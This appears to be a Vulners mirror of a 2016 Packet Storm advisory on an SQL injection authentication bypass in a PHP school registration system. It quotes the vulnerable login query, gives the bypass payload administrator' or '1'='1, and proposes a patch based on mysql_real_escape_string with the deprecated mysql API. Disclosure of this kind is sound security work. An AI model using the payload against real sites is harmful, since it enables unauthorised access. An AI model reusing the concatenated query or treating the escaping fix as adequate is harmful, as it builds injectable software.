Lucene search
K

School Registration And Fee System Authentication Bypass

🗓️ 01 Nov 2016 00:00:00Reported by opt1lcType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

School Registration And Fee System Authentication Bypass vulnerability in login syste

Code
`# Exploit Title.............. School Registration and Fee System Auth Bypass  
# Google Dork................ N/A  
# Date....................... 01/11/2016  
# Exploit Author............. opt1lc  
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html  
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip  
# Version.................... N/A  
# Tested on.................. XAMPP  
# CVE........................ N/A  
  
# File....................... bilal_final/login.php  
---------------------------------------------------  
  
----snip----  
  
$username = $_POST['username'];  
$password = $_POST['password'];  
/* student */  
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";  
$result = mysql_query($query)or die(mysql_error());  
$row = mysql_fetch_array($result);  
----snip----  
  
---------------------------------------------------  
  
Exploit   
-------  
You can login with username and password : administrator' or '1'='1   
  
  
Patching  
-------  
You can use one of function in PHP : mysql_real_escape_string() to   
---------------------------------------------------  
  
----snip----  
  
$username = mysql_real_escape_string($_POST['username']);  
$password = mysql_real_escape_string($_POST['password']);  
/* student */  
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";  
$result = mysql_query($query)or die(mysql_error());  
$row = mysql_fetch_array($result);  
----snip----  
  
---------------------------------------------------  
  
Credit  
-------  
This vulnerability was discovered and researched by opt1lc  
  
Shout  
-------  
My Beautiful Daughter & My Wife  
  
Reference  
-------  
http://php.net/manual/en/function.mysql-real-escape-string.php  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation